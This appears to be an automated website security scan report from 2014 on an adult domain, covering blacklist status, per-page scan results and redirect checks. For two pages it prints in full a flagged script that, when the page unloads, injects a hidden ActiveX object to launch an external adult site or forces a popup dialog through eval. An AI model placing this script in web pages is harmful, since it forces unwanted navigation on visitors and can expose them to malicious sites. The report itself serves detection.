Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ww2.sexyjelenajensen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ww2.sexyjelenajensen.com/ | 200 OK Content-Length: 12182 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.wantboobs.com var exit = true; function pop () { if(exit){ var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2){ document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"; iie.launchURL("http://www.wantboobs.com/trial.htm"); } else { eval("window.showModalDialog('http://www.wantboobs.com/trial.htm','','dialogWidth:780px; dialogHeight:600px;'"); } } } if(exit){ eval("window.attachEvent('onunload',pop);"); } Decoded script: window.attachEvent('onunload',pop); window.attachEvent('onunload',pop); function pop() { if (exit) { var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = window.navigator.userAgent.indexOf("SV1") != -1; if (isXPSP2) { document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>"; iie.launchURL("http://www.wantboobs.com/trial.htm"); } else { eval("window.showModalDialog('http://www.wantboobs.com/trial.htm','','dialogWidth:780px; dialogHeight:600px;'"); } } } | ||
http://ww2.sexyjelenajensen.com/tour.html | 200 OK Content-Length: 6492 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.wantboobs.com var exit = true; function pop () { if(exit){ var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2){ document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"; iie.launchURL("http://www.wantboobs.com/trial.htm"); } else { eval("window.showModalDialog('http://www.wantboobs.com/trial.htm','','dialogWidth:780px; dialogHeight:600px;'"); } } } if(exit){ eval("window.attachEvent('onunload',pop);"); } Decoded script: window.attachEvent('onunload',pop); window.attachEvent('onunload',pop); function pop() { if (exit) { var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = window.navigator.userAgent.indexOf("SV1") != -1; if (isXPSP2) { document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>"; iie.launchURL("http://www.wantboobs.com/trial.htm"); } else { eval("window.showModalDialog('http://www.wantboobs.com/trial.htm','','dialogWidth:780px; dialogHeight:600px;'"); } } } | ||
http://www.iloveboobs.com/wbbigtits.js | 200 OK Content-Length: 2516 Content-Type: application/x-javascript | clean |
http://ww2.sexyjelenajensen.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 08 Apr 2014 03:14:05 GMT Location: http://ww2.sexyjelenajensen.com Server: Apache/2.2.3 (CentOS) Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ww2.sexyjelenajensen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Apr 2014 03:14:04 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: ww2.sexyjelenajensen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Apr 2014 03:14:04 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ww2.sexyjelenajensen.com
Referer: http://www.google.com/search?q=ww2.sexyjelenajensen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ww2.sexyjelenajensen.com
Referer: http://www.google.com/search?q=ww2.sexyjelenajensen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.